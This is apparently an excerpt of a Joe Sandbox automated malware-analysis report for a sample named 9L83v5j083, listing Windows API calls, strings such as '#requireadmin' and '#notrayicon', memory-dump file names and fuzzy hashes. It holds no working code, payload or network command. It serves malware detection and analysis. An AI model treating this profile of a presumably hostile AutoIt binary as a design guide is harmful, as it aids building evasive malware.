                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                  • String ID: \
                                                                                                                  • API String ID: 321622961-2967466578
                                                                                                                  • Opcode ID: 3116705ccae5b035fb050d3d24a4b0e96dbfb2baa543bedfe79533bbc9dedcaa
                                                                                                                  • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                  • Opcode Fuzzy Hash: 3116705ccae5b035fb050d3d24a4b0e96dbfb2baa543bedfe79533bbc9dedcaa
                                                                                                                  • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                  • Opcode ID: bbd0115777c328fe2b5b97631fd4b032eb1a1adf87e6235e777947e3b4874035
                                                                                                                  • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                                  • Opcode Fuzzy Hash: bbd0115777c328fe2b5b97631fd4b032eb1a1adf87e6235e777947e3b4874035
                                                                                                                  • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                  • _wprintf.LIBCMT ref: 004340A1
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                  Strings
                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                  • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                  • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                                  • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                  • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                  • __lock.LIBCMT ref: 00417981
                                                                                                                    • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                    • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                    • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                  • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                  • __lock.LIBCMT ref: 004179A2
                                                                                                                  • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                  • String ID: KERNEL32.DLL$pI
                                                                                                                  • API String ID: 637971194-197072765
                                                                                                                  • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                  • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                  • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                  • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$_malloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1938898002-0
                                                                                                                  • Opcode ID: 73674fc802f976775a05c668b62dda99c102d8f6a74d0df4d4808be2a4a36599
                                                                                                                  • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                                  • Opcode Fuzzy Hash: 73674fc802f976775a05c668b62dda99c102d8f6a74d0df4d4808be2a4a36599
                                                                                                                  • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                  • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                                                                  • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                                                                    • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3771399671-0
                                                                                                                  • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                                  • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                                                                  • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                                  • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                                                                  APIs
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                  • _memmove.LIBCMT ref: 0044B555
                                                                                                                  • _memmove.LIBCMT ref: 0044B578
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2737351978-0
                                                                                                                  • Opcode ID: 6f69eb1500ddff866fea4724b6fdad163b1349e060982c7661435cb54583617d
                                                                                                                  • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                  • Opcode Fuzzy Hash: 6f69eb1500ddff866fea4724b6fdad163b1349e060982c7661435cb54583617d
                                                                                                                  • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                  APIs
                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                                  • __calloc_crt.LIBCMT ref: 00415246
                                                                                                                  • __getptd.LIBCMT ref: 00415253
                                                                                                                  • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                                  • _free.LIBCMT ref: 0041529E
                                                                                                                  • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3638380555-0
                                                                                                                  • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                                                  • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                                  • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                                                  • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                  • API String ID: 3207048006-625585964
                                                                                                                  • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                  • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                  • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                  • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                  APIs
                                                                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                  • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                  • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                  • _memmove.LIBCMT ref: 004656CA
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                  • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2945290962-0
                                                                                                                  • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                  • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                  • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                  • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                  APIs
                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                  • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                  • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1457242333-0
                                                                                                                  • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                  • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                                  • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                  • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 15295421-0
                                                                                                                  • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                  • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                                  • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                  • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                  • _wcstok.LIBCMT ref: 004675B2
                                                                                                                    • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                  • _wcscpy.LIBCMT ref: 00467641
                                                                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                  • _wcslen.LIBCMT ref: 00467793
                                                                                                                  • _wcslen.LIBCMT ref: 004677BD
                                                                                                                    • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                                  • String ID: X
                                                                                                                  • API String ID: 780548581-3081909835
